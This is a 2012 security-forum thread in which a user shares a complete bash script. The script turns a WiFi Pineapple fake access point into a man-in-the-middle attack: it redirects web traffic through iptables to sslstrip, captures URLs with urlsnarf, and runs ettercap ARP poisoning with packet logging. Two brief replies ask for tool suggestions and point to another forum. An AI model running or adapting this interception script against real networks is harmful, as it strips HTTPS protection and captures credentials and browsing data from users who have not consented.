dwek Posted July 15, 2012 Share Posted July 15, 2012 Hi, I'm working on a script to leverage the standard WP4.sh script for the Pineapple IV, combined with a MITM SSLstip script. The below is sort of working , but I have issues with the first iptables statement forwarding properly and how URLsnarf & SSLstrip are being passed traffic. I'm also thinking that excluding ARP poisoning the Pineapple might be a good idea,. Any thoughts? It's probably something obvious or just my lack of looking. Either way, I thought I would share what I have got so far. Thanks #!/bin/bash #This script combines the Wireless Pinapple (wp4.sh) and the MITM script v1.0 beta found at #http://360percents.com/posts/automatic-mitm-shell-script/ #define variables echo -n "Input Pineapple Netmask [or ENTER for 255.255.255.0]: " read pineapplenetmask if [[ $pineapplenetmask == '' ]]; then pineapplenetmask=255.255.255.0 #Default netmask for /24 network fi echo -n "Input Pineapple Network [or ENTER for 172.16.42.0/24]: " read pineapplenet if [[ $pineapplenet == '' ]]; then pineapplenet=172.16.42.0/24 # Pineapple network. Default is 172.16.42.0/24 pineapplerange=172.16.42.2-254 # Pineapple network. Default is 172.16.42.2-254 excluding the Pinapple IP fi if [[ $pineapplenet != '172.16.42.0/24' ]]; then pineapplerange=$pineapplenet # If default 172.16.42.0/24 is not selected, provide reduced target scope to ettercap fi echo -n "Input Interface between PC and Pineapple [or ENTER for eth0]: " read pineapplelan if [[ $pineapplelan == '' ]]; then pineapplelan=eth0 # Interface of ethernet cable directly connected to Pineapple fi echo -n "Input Interface between PC and Internet [or ENTER for wlan0]: " read pineapplewan if [[ $pineapplewan == '' ]]; then pineapplewan=wlan0 #i.e. wlan0 for wifi, ppp0 for 3g modem/dialup, eth0 for lan fi temppineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default echo -n "Input Internet Gateway [or ENTER for $temppineapplegw]: " read pineapplegw if [[ $pineapplegw == '' ]]; then pineapplegw=`netstat -nr | awk 'BEGIN {while ($3!="0.0.0.0") getline; print $2}'` #Usually correct by default fi echo -n "Input IP Address of Host PC [or ENTER for 172.16.42.42]: " read pineapplehostip if [[ $pineapplehostip == '' ]]; then pineapplehostip=172.16.42.42 #IP Address of host computer fi echo -n "Input IP Address of Pineapple [or ENTER for 172.16.42.1]: " read pineappleip if [[ $pineappleip == '' ]]; then pineappleip=172.16.42.1 #Thanks Douglas Adams fi #Display settings echo Pineapple connected to: $pineapplelan echo Internet connection from: $pineapplewan echo Internet connection gateway: $pineapplegw echo Host Computer IP: $pineapplehostip echo Pineapple IP: $pineappleip echo Network: $pineapplenet echo Netmask: $pineapplenetmask #Bring up Ethernet Interface directly connected to Pineapple ifconfig $pineapplelan $pineapplehostip netmask $pineapplenetmask up # Enable IP Forwarding echo '1' > /proc/sys/net/ipv4/ip_forward echo -n "IP Forwarding enabled. /proc/sys/net/ipv4/ip_forward set to " cat /proc/sys/net/ipv4/ip_forward #clear chains and rules iptables -X iptables -F echo iptables chains and rules cleared #setup IP forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 -j ACCEPT iptables -A FORWARD -i $pineapplewan -o $pineapplelan -s $pineapplenet -m state --state NEW -j ACCEPT iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE echo IP Forwarding Enabled #remove default route route del default echo Default route removed #add default gateway route add default gw $pineapplegw $pineapplewan echo Pineapple Default Gateway Configured #create directory to store session results echo -n "Name of 'Session'? (name of the folder that will be created with all the log files): " read -e SESSION mkdir /root/$SESSION/ # Sslstrip echo "[+] Starting sslstrip" xterm -geometry 75x15+1+200 -T sslstrip -e /pentest/web/sslstrip/sslstrip.py -f -s -k -w /root/$SESSION/$SESSION.log & sleep 2 # urlsnarf echo "[+] Starting urlsnarf" urlsnarf -i $pineapplelan | grep http > /root/$SESSION/$SESSION.txt & sleep 1 # Ettercap echo "" echo "[+] Starting ettercap" xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -hold -e ettercap -Tq -P autoadd -i $pineapplelan -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp:remote /"$pineappleip"/ /"$pineapplerange"/ & cat /proc/sys/net/ipv4/ip_forward iptables -t nat -L sleep 1 #instructions #echo All set. Now on the Pineapple issue: route add default gw $pineapplehostip br-lan ping -c3 $pineappleip if [ $? -eq 0 ]; then echo "" echo "ICS configuration successful." #echo "Issuing on Pineapple: route add default gw $pineapplehostip br-lan" #echo " ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan'" #echo "Enter Pineapple password if prompted" #ssh root@$pineappleip 'route add default gw '$pineapplehostip' br-lan' fi echo "" echo "Browse to http://$pineappleip/pineapple -- Happy Hacking!" echo "" echo "" echo "[+] IMPORTANT" echo -n "After you have finished please close this script and clean up properly by hitting y " echo "" echo "" read WISH echo "" # Clean up sslstrip, ettercap and urlsnarf if [ $WISH = "y" ]; then echo "" echo "[+] Cleaning up and resetting iptables..." killall sslstrip killall ettercap killall urlsnarf killall xterm echo "0" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain etterlog -p -i /root/$SESSION/$SESSION.eci echo "[+] Clean up successful...Bye!" exit fi exit Quote Link to comment Share on other sites More sharing options...
dwek Posted July 16, 2012 Author Share Posted July 16, 2012 I'm now thinking that it may just be easier to write something that uses urlsnarf, sslstrip and ettercap on the Pineapple. As the Pineapple is a fake AP, I won't need to use any ARP poisoning. Anyone know of anything around? I'm assuming this will also need some port forwarding on for sslstrip to work properly. Quote Link to comment Share on other sites More sharing options...
telot Posted August 3, 2012 Share Posted August 3, 2012 Hop on the Jasager forums for more responses! Thats where the pineapple community lives and thrives. We're waist-deep in discussions about ettercap, and theres plenty of threads about sslstrip (I made a nice how-to without ARP) so I think this topic would be especially welcome. Thanks! telot Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.